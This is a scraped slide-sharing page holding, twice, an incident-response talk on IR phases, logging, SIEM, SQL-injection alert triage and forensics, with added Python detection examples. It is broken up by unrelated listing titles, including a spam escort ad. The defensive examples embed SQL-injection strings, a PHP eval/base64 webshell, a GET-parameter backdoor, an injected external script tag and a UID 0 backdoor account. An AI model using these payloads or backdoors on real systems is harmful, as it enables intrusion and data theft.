Incident Response
Operation
Before/After Hacked
Sumedt Jitpukdebodin
Senior Security Researcher @ I-SECURE Co. Ltd.
LPIC-1, NCLA, C|EHv6, eCPPT, eWPT, CompTIA Security+, IWSS, CPTE
# whoami
• Name: Sumedt Jitpukdebodin
• Job: Security Consultant, Senior Security Researcher @ I-SECURE
• Website: www.r00tsec.com, www.techsuii.com
• Admin: @2600thailand, @OWASPThailand
• Book: Network Security Book
• Hobby: Writing, Hacking, Researching, Gaming, etc.
• My articles: search Google for my name.
Hacker
SOC (Security Operation Center)
Attacker And Defender
Catch me if you can
# id
• Hacking is easy, defending is so f*cking hard.
• Attack surfaces
• 0-day vulnerabilities
• Social engineering
• Etc.
Incident Response
# man ir
Definition
• Event: any activity that we monitor and log
• Incident: an event that causes damage (a security violation)
• Incident Response (IR): actions taken after an incident to understand it and take remedial action
Top priorities for IR
• Identify the problem
• Fix the problem
• Recover the system back to normal
Steps of IR
Source:: http://www.emrisk.com/sites/default/files/images/newsletters/Incident%20Response%20Cycle.png
Steps of IR
• Preparation
• Skills, procedures, logs, tools, forms, policies, checklists, etc.
• Detection (Identification) & Analysis
• Based on best practice, research and lessons learned
• Containment
• Eradication
• Remediation
• Post-Incident Activities (Lessons Learned)
• What did they do?
• Where did they go?
• What backdoors did they leave?
• Develop attack signatures
What to look for
• Look for abnormalities
• Performance issues, off-peak activity
• Some clients being redirected
• Example indicators
• New accounts, new directories, new files in the website, file system changes, crashes, unusual system usage patterns
• Example sources
• Access log, IDS, IPS, firewall, system log, suspicious traffic
• Potential issues (obstacles when collecting evidence)
• File/folder encryption
• BIOS password protection
• Whole disk encryption / risk
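Several of the indicators above (new accounts, new files or directories in the web root, file system changes) can be checked mechanically, provided a baseline was taken during the Preparation phase. The Python script below is an added example, not code from the original deck: it hashes a web root and diffs it against a baseline, and diffs two copies of /etc/passwd for new accounts and for extra UID 0 users. The web root, its file contents and the passwd entries are all constructed inline for the demo; in practice the baseline is stored off-host so an intruder cannot rewrite it.

```python
import hashlib
import os
import tempfile


def snapshot_tree(root):
    """Map each file under root (path relative to root) to its SHA-256 digest."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            snap[os.path.relpath(full, root)] = digest.hexdigest()
    return snap


def diff_snapshots(baseline, current):
    """Return (added, modified, removed) lists of relative paths, each sorted."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current)
                      if baseline[p] != current[p])
    return added, modified, removed


def parse_passwd(text):
    """Parse /etc/passwd content into {username: (uid, gid, shell)}."""
    users = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or line.startswith("#"):
            continue  # skip comments and malformed lines
        users[fields[0]] = (int(fields[2]), int(fields[3]), fields[6])
    return users


def account_changes(baseline_passwd, current_passwd):
    """Return (new_accounts, extra_uid0); a UID 0 account other than root is a classic backdoor."""
    old = parse_passwd(baseline_passwd)
    new = parse_passwd(current_passwd)
    new_accounts = sorted(set(new) - set(old))
    extra_uid0 = sorted(u for u, (uid, _gid, _sh) in new.items() if uid == 0 and u != "root")
    return new_accounts, extra_uid0


def demo():
    """Build a tiny constructed web root, baseline it, then simulate post-breach changes."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "uploads"))
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php echo 'hello'; ?>\n")
        with open(os.path.join(root, "config.php"), "w") as fh:
            fh.write("<?php $db = 'prod'; ?>\n")
        baseline = snapshot_tree(root)  # would be stored off-host during Preparation

        # constructed post-compromise changes: a new PHP file in the upload
        # directory and a script tag appended to the front page
        with open(os.path.join(root, "uploads", "cache.php"), "w") as fh:
            fh.write("<?php /* unexpected new file */ ?>\n")
        with open(os.path.join(root, "index.php"), "a") as fh:
            fh.write("<script src='http://example.invalid/x.js'></script>\n")
        fs_changes = diff_snapshots(baseline, snapshot_tree(root))

    # constructed /etc/passwd before and after: a new account that also has UID 0
    passwd_before = ("root:x:0:0:root:/root:/bin/bash\n"
                     "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n")
    passwd_after = passwd_before + "sysbackup:x:0:0::/tmp:/bin/bash\n"
    return fs_changes, account_changes(passwd_before, passwd_after)


if __name__ == "__main__":
    (added, modified, removed), (new_accounts, extra_uid0) = demo()
    print("added:", added, "modified:", modified, "removed:", removed)
    print("new accounts:", new_accounts, "extra uid 0:", extra_uid0)
```

Run it as-is to see the two constructed changes reported; point snapshot_tree at a real document root and compare against a saved baseline to use it for real. A package-manager verify (rpm -V, debsums) covers OS files the same way, but not your own web content.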
Before Breach
Source:: http://jokideo.com/wp-content/uploads/2013/03/Funny-cat-Come-on-birdy.jpg
Centralized Log Diagram
Source:: http://www.sysadmin.in.th/course/LogFiles/Centralized_Logs_Server_by_SysAdmin.jpg
# whereis logs
• Device Log
• Server Log
• Application Log
# ls /var/log/
• web_server/{access.log,error.log}
• audit/audit.log
• syslog
• openvpn.log
# cat /var/log/apache2/access.log
# cat /var/log/syslog
Devices
• Firewall
• IDS/IPS
• Next Generation Firewall
• Mail Gateway
• Etc.
Centralized Log
• syslog-ng / rsyslog
• Splunk
• Graylog2
• Logstash
• Scribe
Example of Splunk
SIEM (Security Information and Event Management)
• ArcSight
• Log Correlation Engine by Tenable
• Splunk
• OSSIM **
• AlienVault **
• LOGalyze **
• Etc.
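What a SIEM adds over a central pile of logs is correlation across sources. The Python below is an added example, not code from the deck or from any of the products listed: it runs a "brute force, then success" rule over OpenSSH sshd syslog lines collected from two hosts. The log lines are constructed (documentation IP ranges, made-up host names); the year is assumed because syslog timestamps carry none. The per_host variant shows the same rule run against each server's log in isolation, which is what you have without centralized logging.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH sshd syslog lines; "invalid user" is prefixed when the username does not exist
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<outcome>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

# constructed sample: one source spreads its guesses across two hosts, then gets into db01
SAMPLE_SYSLOG = """\
Mar 10 02:10:01 web01 sshd[2231]: Failed password for invalid user admin from 203.0.113.7 port 51122 ssh2
Mar 10 02:10:03 web01 sshd[2233]: Failed password for root from 203.0.113.7 port 51124 ssh2
Mar 10 02:10:05 db01 sshd[1187]: Failed password for root from 203.0.113.7 port 51126 ssh2
Mar 10 02:10:07 db01 sshd[1189]: Failed password for invalid user oracle from 203.0.113.7 port 51128 ssh2
Mar 10 02:10:09 web01 sshd[2236]: Failed password for deploy from 203.0.113.7 port 51130 ssh2
Mar 10 02:10:11 db01 sshd[1191]: Failed password for deploy from 203.0.113.7 port 51132 ssh2
Mar 10 02:10:14 db01 sshd[1193]: Accepted password for deploy from 203.0.113.7 port 51134 ssh2
Mar 10 02:11:00 web01 sshd[2240]: Failed password for alice from 198.51.100.5 port 40010 ssh2
Mar 10 02:11:05 web01 sshd[2242]: Accepted publickey for alice from 198.51.100.5 port 40012 ssh2
"""


def parse_events(text, year=2015):
    """Parse sshd auth lines into dicts. Syslog timestamps carry no year, so one is assumed."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        events.append({"ts": ts, "host": m["host"], "outcome": m["outcome"],
                       "user": m["user"], "ip": m["ip"]})
    return sorted(events, key=lambda e: e["ts"])


def correlate(events, threshold=5, window=timedelta(seconds=120), per_host=False):
    """Alert when a login success from an IP follows >= threshold failures from that
    IP inside the window. per_host=True keys the rule on (ip, host), i.e. what a
    local check on one server sees without the other hosts' logs."""
    recent = defaultdict(deque)   # key -> deque of (timestamp, host) for recent failures
    alerts = []
    for e in events:
        key = (e["ip"], e["host"]) if per_host else e["ip"]
        q = recent[key]
        while q and e["ts"] - q[0][0] > window:
            q.popleft()           # expire failures that fell out of the window
        if e["outcome"] == "Failed":
            q.append((e["ts"], e["host"]))
        elif len(q) >= threshold:
            alerts.append({"ip": e["ip"], "user": e["user"], "host": e["host"],
                           "failures": len(q),
                           "targets": sorted({h for _t, h in q})})
            q.clear()
    return alerts


if __name__ == "__main__":
    evts = parse_events(SAMPLE_SYSLOG)
    print("centralized:", correlate(evts))
    print("per host   :", correlate(evts, per_host=True))
```

With the logs combined, 203.0.113.7 shows six failures across web01 and db01 followed by a successful password login, which trips the rule; split per host, each server saw only three failures and stays below the threshold. The threshold and window are tuning knobs, and a real rule would also whitelist known scanners and jump hosts.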
Log Correlation Engine By Tenable
Source:: http://www.tenable.com/blog/log-correlation-engine-36-now-with-its-own-gui
ArcSight
Source:: http://blog.rootshell.be/2013/06/26/out-of-the-box-siem-never/
ArcSight Dashboard
Source:: http://www.observeit.com/images/content/features_siem14.jpg
False Positive
SQL Injection Case
• Alert: SQL Injection
• Attacker: China
• Log source: Web Application Firewall
SQL Injection Case
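The SQL injection case above is the classic WAF false positive: a signature keyed on SQL vocabulary fires on a legitimate request that merely contains words like "union" or "select". The script below is an added example, not from the deck, contrasting a naive keyword match over the raw URL with a check that decodes parameter values and demands injection structure (a quote-tautology, a trailing comment, or UNION SELECT in a value that began numeric or that produced a 5xx). The access log lines (Apache combined format), the IPs and the rules are constructed for illustration, not a production ruleset.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache/nginx "combined" access log format; the request URL is logged still URL-encoded
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# constructed sample: two injection attempts from one source, then two legitimate
# requests whose words happen to be SQL keywords (the classic false positive)
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2015:02:14:01 +0700] "GET /news.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 5123
203.0.113.7 - - [10/Mar/2015:02:14:03 +0700] "GET /news.php?id=1%20UNION%20SELECT%20user,password%20FROM%20users-- HTTP/1.1" 500 811
198.51.100.20 - - [10/Mar/2015:09:01:44 +0700] "GET /search.php?q=union+select+committee+report HTTP/1.1" 200 9320
198.51.100.21 - - [10/Mar/2015:09:05:10 +0700] "GET /articles/how-to-select-a-union-rep HTTP/1.1" 200 7100
"""

NAIVE = re.compile(r"'|--|\b(union|select)\b", re.I)          # keyword or quote anywhere in the URL
TAUTOLOGY = re.compile(r"'\s*(or|and)\s+'?\w+'?\s*=", re.I)    # ' OR '1'=  style
UNION_SELECT = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)
COMMENT_END = re.compile(r"(--|#|/\*)\s*$")                   # trailing SQL comment


def parse_line(line):
    """Split one combined-format line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    parts = urlsplit(entry["url"])
    entry["path"] = unquote_plus(parts.path)
    entry["params"] = parse_qsl(parts.query, keep_blank_values=True)  # decodes values
    return entry


def naive_match(entry):
    """Signature-style check on the whole decoded URL: cheap, and prone to false positives."""
    return bool(NAIVE.search(unquote_plus(entry["url"])))


def strict_match(entry):
    """Look only at parameter values and require injection structure, not vocabulary."""
    for _name, value in entry["params"]:
        if TAUTOLOGY.search(value) or COMMENT_END.search(value):
            return True
        # UNION SELECT in a value that started numeric, or that broke the app (5xx)
        if UNION_SELECT.search(value) and (value[:1].isdigit() or entry["status"] >= 500):
            return True
    return False


def triage(log_text):
    """Return (naive_hit_urls, strict_hit_urls, strict_hits_by_ip) for the given log text."""
    entries = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    naive = [e["url"] for e in entries if naive_match(e)]
    strict = [e for e in entries if strict_match(e)]
    by_ip = Counter(e["ip"] for e in strict)
    return naive, [e["url"] for e in strict], by_ip


if __name__ == "__main__":
    naive, strict, by_ip = triage(SAMPLE_LOG)
    print(f"naive rule fired on {len(naive)} requests, strict rule on {len(strict)}")
    for ip, n in by_ip.most_common():
        print(f"  {ip}: {n} likely injection attempts")
```

On the sample the naive rule fires on all four requests, the strict one only on the two against news.php, both from the same source. When triaging a WAF alert, look at the decoded parameter value, the response code, and how many requests the source made, before escalating it to an incident.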
After Breach
Source:: http://www.dumpaday.com/wp-content/uploads/2013/01/funny-cat-bath.jpg
Forensic
Forensic
• Containment
• Ensure that the system(s) and network are protected from further risk
• Isolate the compromised system(s)
• Eradication
• How did they get in?
• Where did they go?
• What did they do?
• Remove malware
• Identify the vulnerability
• Patch the vulnerability
• Improve network and system countermeasures
Recovery (Restore/Rebuild)
• Restore the service to normal status
• System owners decide, based on advice from the incident handling team (a business decision)
• Monitor the service after recovery
• Performance
• Anomalies
Lessons Learned
• Detailed incident report
• Communicate to others on the team
• Apply fixes in the environment
• Conduct a performance analysis of the overall incident and improve operations
• Do "not" blame people
• Review/rewrite policy
• Determine the cost of the incident
• Apply lessons learned across the entire organization
• Budget for, install and maintain protection software
Artificial intelligence in the post-deep learning era
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 

Incident response before:after breach

Incident Response Operation Before/After Hacked
Sumedt Jitpukdebodin
Senior Security Researcher @ I-SECURE Co. Ltd.
LPIC-1, NCLA, C|EHv6, eCPPT, eWPT, CompTIA Security+, IWSS, CPTE

# whoami
• Name: Sumedt Jitpukdebodin
• Jobs: Security Consultant, Senior Security Researcher @ I-SECURE
• Website: www.r00tsec.com, www.techsuii.com
• Admin: @2600thailand, @OWASPThailand
• Book: Network Security Book
• Hobby: Writing, Hacking, Researching, Gaming, etc.
• My articles: please search Google for my name.

# id
• Hacking is easy; defending is so f*cking hard.
• Attack surfaces
• 0day
• Social Engineering
• Etc.

Definition
• Event - an activity that we monitor (a log entry)
• Incident - an event that causes damage, or an imminent threat of it
• Incident Response (IR) - actions taken after an incident to understand it and take remedial action

Top Priority for IR
• Identify the problem
• Fix the problem
• Recover the system to normal operation
Step of IR.
Source: http://www.emrisk.com/sites/default/files/images/newsletters/Incident%20Response%20Cycle.png

Step of IR.
• Preparation
• Skills, procedures, logs, tools, forms, policies, checklists, etc.
• Detection (Identification) & Analysis
• From best practice, research and lessons learned
• Containment
• Eradication
• Remediation
• Post-Incident Activities (Lessons Learned)
• What did they do
• Where did they go
• What backdoors did they leave
• Develop attack signatures
What to look for
• Look for abnormalities
• Performance issues, off-peak activity
• Some clients being redirected
• Example indicators
• New accounts, new directories, new files in the website, file system changes, crashes, unusual system usage patterns
• Example sources
• Access log, IDS, IPS, firewall, system log, suspicious traffic
• Potential issues (obstacles when collecting evidence)
• File/folder encryption
• BIOS password protection
• Whole-disk encryption / risk
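Added example (not from the original deck): the indicators on the slide above, new accounts, off-peak activity and unusual usage, turned into a check that runs over Linux auth/syslog lines and returns structured findings. The log lines, the host name web01, the business-hours window and the service-account, group and shell lists are constructed assumptions for the demo, not values from the slides.

```python
"""Scan constructed auth/syslog lines for the indicator types the slide names
(new accounts, off-peak activity, unusual usage). Added example, not from
the original deck; every sample line below is constructed."""
import re
from collections import Counter, defaultdict

# Constructed sample lines in classic syslog format (auth facility).
SAMPLE_AUTH_LOG = """\
Mar 10 09:12:01 web01 sshd[2201]: Accepted publickey for deploy from 10.0.0.5 port 51234 ssh2
Mar 10 09:15:44 web01 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
Mar 10 23:41:07 web01 sshd[4410]: Accepted password for www-data from 203.0.113.7 port 40211 ssh2
Mar 10 23:42:19 web01 useradd[4421]: new user: name=support, UID=1003, GID=1003, home=/home/support, shell=/bin/bash
Mar 10 23:42:40 web01 usermod[4430]: add 'support' to group 'sudo'
Mar 10 23:43:02 web01 sshd[4440]: Accepted password for support from 203.0.113.7 port 40212 ssh2
Mar 10 23:43:30 web01 sudo:  support : TTY=pts/1 ; PWD=/home/support ; USER=root ; COMMAND=/bin/bash
Mar 11 02:05:10 web01 sshd[5120]: Accepted password for support from 203.0.113.7 port 40300 ssh2
Mar 11 08:30:00 web01 sshd[6001]: Accepted publickey for deploy from 10.0.0.5 port 51300 ssh2
"""

BUSINESS_HOURS = range(8, 19)                       # assumption: 08:00-18:59 is "peak" for this host
SERVICE_ACCOUNTS = {"www-data", "nobody", "root"}   # assumption: must never log in interactively
PRIVILEGED_GROUPS = {"sudo", "wheel", "admin"}
SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/usr/bin/su"}

LINE_RE = re.compile(r"^(?P<ts>\w{3} +\d+ (?P<hour>\d\d):\d\d:\d\d) (?P<host>\S+) "
                     r"(?P<proc>[^:\[]+)(?:\[\d+\])?: (?P<msg>.*)$")
ACCEPT_RE = re.compile(r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+)")
NEWUSER_RE = re.compile(r"new user: name=(?P<user>[^,]+)")
GROUP_RE = re.compile(r"add '(?P<user>[^']+)' to group '(?P<group>[^']+)'")
SUDO_RE = re.compile(r"^\s*(?P<user>\S+) : .*COMMAND=(?P<cmd>.+)$")


def find_indicators(text):
    """Return a list of (indicator, detail) pairs, in log order."""
    findings = []
    known_ips = defaultdict(set)   # user -> source IPs already seen in this log
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        msg, hour = m["msg"], int(m["hour"])
        if nu := NEWUSER_RE.search(msg):
            findings.append(("new_account", nu["user"]))
        if g := GROUP_RE.search(msg):
            if g["group"] in PRIVILEGED_GROUPS:
                findings.append(("privileged_group_add", f"{g['user']} -> {g['group']}"))
        if a := ACCEPT_RE.search(msg):
            user, ip, method = a["user"], a["ip"], a["method"]
            if hour not in BUSINESS_HOURS:
                findings.append(("off_peak_login", f"{user} at {hour:02d}h from {ip}"))
            if user in SERVICE_ACCOUNTS and method == "password":
                findings.append(("service_account_password_login", f"{user} from {ip}"))
            if known_ips[user] and ip not in known_ips[user]:
                findings.append(("new_source_ip", f"{user} from {ip}"))
            known_ips[user].add(ip)
        if s := SUDO_RE.match(msg):
            # sudo to an interactive shell is the usual "escalate and stay" move
            if s["cmd"].strip().split()[0] in SHELLS:
                findings.append(("sudo_shell", f"{s['user']}: {s['cmd'].strip()}"))
    return findings


def summarize(findings):
    """Count findings per indicator type, the first thing a SOC view should show."""
    return Counter(kind for kind, _ in findings)


if __name__ == "__main__":
    for kind, detail in find_indicators(SAMPLE_AUTH_LOG):
        print(f"{kind:32} {detail}")
    print(summarize(find_indicators(SAMPLE_AUTH_LOG)))
```

The sample tells the story the slide warns about: a service account logs in with a password at night, a new account is created, added to sudo, and immediately used to open a root shell. None of these lines is an error; each is only visible as an abnormality against what the host normally does, which is why the business-hours window and the account lists have to be tuned per host.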
Centralized Log Diagram
Source: http://www.sysadmin.in.th/course/LogFiles/Centralized_Logs_Server_by_SysAdmin.jpg

# whereis logs
• Device Log
• Server Log
• Application Log

# ls /var/log/
• web_server/{access.log,error.log}
• audit/audit.log
• syslog
• openvpn.log

Devices
• Firewall
• IDS/IPS
• Next Generation Firewall
• Mail Gateway
• Etc.

Centralized Log
• syslog-ng / rsyslog
• Splunk
• Graylog2
• logstash
• Scribe

SIEM ("Security Information and Event Management")
• ArcSight
• Log Correlation Engine by Tenable
• Splunk
• OSSIM **
• AlienVault **
• LOGalyze **
• Etc.

Log Correlation Engine by Tenable
Source: http://www.tenable.com/blog/log-correlation-engine-36-now-with-its-own-gui

SQL Injection Case
• Alert: SQL Injection
• Attacker: China
• Log From: Web Application Firewall
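Added example (not from the original deck): a WAF alert like the one in the case above says that one request looked like SQL injection; the analyst's next step is to re-read the web server access log and reconstruct what the source did before and after. The code below scores each request against a small signature set, correlates a lone quote with an HTTP 500 (the classic error probe), and aggregates per source IP into what an incident report needs: first/last seen, paths, user agents and whether data extraction was attempted. The access-log lines, IPs and paths are constructed assumptions; the geolocation step ("Attacker: China") is not reproduced because it needs an external lookup.

```python
"""Triage a SQL-injection alert from the access log behind it. Added example,
not from the original deck; the log lines below are constructed."""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed "combined" format lines. 203.0.113.45 runs a textbook SQLi
# progression; 198.51.100.8 is a normal user whose search term contains a quote.
SAMPLE_ACCESS_LOG = """\
203.0.113.45 - - [12/Mar/2015:03:14:07 +0700] "GET /product.php?id=17 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Mar/2015:03:14:09 +0700] "GET /product.php?id=17' HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Mar/2015:03:14:12 +0700] "GET /product.php?id=17%20AND%201=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Mar/2015:03:14:13 +0700] "GET /product.php?id=17%20AND%201=2 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Mar/2015:03:14:20 +0700] "GET /product.php?id=-1%20UNION%20SELECT%201,user(),version()-- HTTP/1.1" 200 2310 "-" "sqlmap/1.0"
203.0.113.45 - - [12/Mar/2015:03:15:02 +0700] "GET /product.php?id=-1%20UNION%20SELECT%201,table_name,3%20FROM%20information_schema.tables-- HTTP/1.1" 200 9800 "-" "sqlmap/1.0"
198.51.100.8 - - [12/Mar/2015:09:02:11 +0700] "GET /product.php?id=42 HTTP/1.1" 200 5010 "-" "Mozilla/5.0"
198.51.100.8 - - [12/Mar/2015:09:02:30 +0700] "GET /search.php?q=o'neil HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                     r'(?P<status>\d{3}) (?P<bytes>\d+|-)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?')

# (pattern, weight, technique name), applied to the URL-decoded request target.
SIGNATURES = [
    (re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I), 5, "union_select"),
    (re.compile(r"\binformation_schema\b", re.I), 4, "schema_enumeration"),
    (re.compile(r"\b(user|version|database)\s*\(", re.I), 3, "db_fingerprint"),
    (re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I), 3, "boolean_tautology"),
    (re.compile(r"--\s*$|#\s*$|/\*"), 2, "comment_terminator"),
    (re.compile(r"'"), 1, "quote"),
]


def score_request(target, status):
    """Score one request target; returns (score, techniques, decoded_target)."""
    decoded = unquote_plus(target)   # one round of %xx decoding, as the application sees it
    techniques = [name for pat, _, name in SIGNATURES if pat.search(decoded)]
    score = sum(w for _, w, name in SIGNATURES if name in techniques)
    # A lone quote is weak evidence (legitimate input contains quotes), but a
    # quote that produced HTTP 500 is the classic error-based probe.
    if status == 500 and "quote" in techniques:
        techniques.append("error_probe")
        score += 3
    return score, techniques, decoded


def triage(text, threshold=3):
    """Aggregate flagged requests per source IP for the incident report."""
    by_ip = {}
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        score, techniques, decoded = score_request(m["target"], int(m["status"]))
        if score < threshold:
            continue
        e = by_ip.setdefault(m["ip"], {"requests": 0, "first_seen": m["ts"], "last_seen": m["ts"],
                                        "techniques": set(), "paths": set(), "user_agents": set(),
                                        "max_score": 0})
        e["requests"] += 1
        e["last_seen"] = m["ts"]
        e["techniques"].update(techniques)
        e["paths"].add(urlsplit(decoded).path)
        e["user_agents"].add(m["ua"] or "-")
        e["max_score"] = max(e["max_score"], score)
    for e in by_ip.values():
        extracted = {"union_select", "schema_enumeration"} & e["techniques"]
        e["assessment"] = "data extraction attempted" if extracted else "probing only"
    return by_ip


if __name__ == "__main__":
    for ip, e in triage(SAMPLE_ACCESS_LOG).items():
        print(ip, e["first_seen"], "->", e["last_seen"], e["requests"], "requests,", e["assessment"])
        print("  techniques:", sorted(e["techniques"]), "user agents:", sorted(e["user_agents"]))
```

The point of the weighting is to keep the o'neil search out of the report while still catching the error probe that precedes the UNION queries; a WAF that alerted only on the UNION line would have missed the first 11 seconds of the attack, which is exactly the window containment has to account for.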
Forensic
• Containment
• Ensure that the system(s) and network are protected from further risk.
• Isolate the compromised system(s)
• Eradication
• How they got in
• Where they went
• What they did
• The removal of malware
• Patching the vulnerability
• Identifying the vulnerability
• Improve network and system countermeasures
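Added example (not from the original deck): "where they went", "what they did" and "what backdoors they left" are answered for a web root by diffing file hashes taken before and after the incident and then scanning every new or modified file for webshell-style constructs. The web root, its files and the simulated compromise are constructed in a temporary directory for the demo; the baseline snapshot is the part that must already exist before the incident, stored off-host so the attacker cannot rewrite it.

```python
"""Baseline-diff plus webshell scan for a web root. Added example, not from the
original deck; the web root and the compromise below are constructed."""
import hashlib
import re
import tempfile
from pathlib import Path

# PHP constructs that almost never appear in legitimate application code but
# are the backbone of one-line webshells (eval/base64, callable superglobals).
WEBSHELL_RE = re.compile(
    rb"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\("
    rb"|\bbase64_decode\s*\("
    rb"|\$_(GET|POST|REQUEST|COOKIE)\[[^\]]*\]\s*\(",
    re.I,
)


def snapshot(root):
    """Map relative path -> SHA-256 for every regular file under root."""
    root = Path(root)
    return {str(p.relative_to(root)).replace("\\", "/"): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_snapshots(before, after):
    """Return added / removed / modified relative paths between two snapshots."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(p for p in before.keys() & after.keys() if before[p] != after[p]),
    }


def scan_for_webshell(root, rel_paths):
    """Return {path: first matching construct} for files that look like webshells."""
    hits = {}
    for rel in rel_paths:
        m = WEBSHELL_RE.search((Path(root) / rel).read_bytes())
        if m:
            hits[rel] = m.group(0).decode(errors="replace")
    return hits


def demo():
    """Build a tiny web root, take a baseline, simulate a compromise, investigate."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "lib").mkdir()
        (root / "img").mkdir()
        (root / "index.php").write_text("<?php include 'lib/db.php'; echo 'hello'; ?>\n")
        (root / "lib" / "db.php").write_text("<?php $dsn = 'mysql:host=db'; ?>\n")
        (root / "img" / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n")
        baseline = snapshot(root)   # in practice: taken at deploy time, stored off-host

        # --- simulated attacker activity (constructed for the demo) ---
        (root / "img" / ".cache.php").write_text(            # dropped webshell, hidden in an image dir
            "<?php @eval(base64_decode($_POST['c'])); ?>\n")
        (root / "index.php").write_text(                     # backdoor appended to a legitimate page
            "<?php include 'lib/db.php'; echo 'hello'; ?>\n"
            "<?php if (isset($_GET['x'])) { $_GET['x']($_GET['a']); } ?>\n")
        (root / "lib" / "db.php").unlink()                   # evidence removed

        changes = diff_snapshots(baseline, snapshot(root))
        suspicious = scan_for_webshell(root, changes["added"] + changes["modified"])
        return changes, suspicious


if __name__ == "__main__":
    changes, suspicious = demo()
    for kind, paths in changes.items():
        print(f"{kind:9} {paths}")
    for path, construct in suspicious.items():
        print(f"webshell? {path}: {construct}")
```

Two caveats a handler should keep in mind: the content scan only catches the obvious constructs, so every file in the added/modified lists deserves a look even when the regex is silent; and hashing the live file system tells you nothing about files the attacker deleted beyond their names, which is where the removed list points the forensic image work.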
Recovery (Restore/Rebuild)
• Restore the service to normal status
• System owners decide, based on advice from the incident handling team - a business decision
• Monitor the service after recovery
• Performance
• Anomalies

Lessons Learned
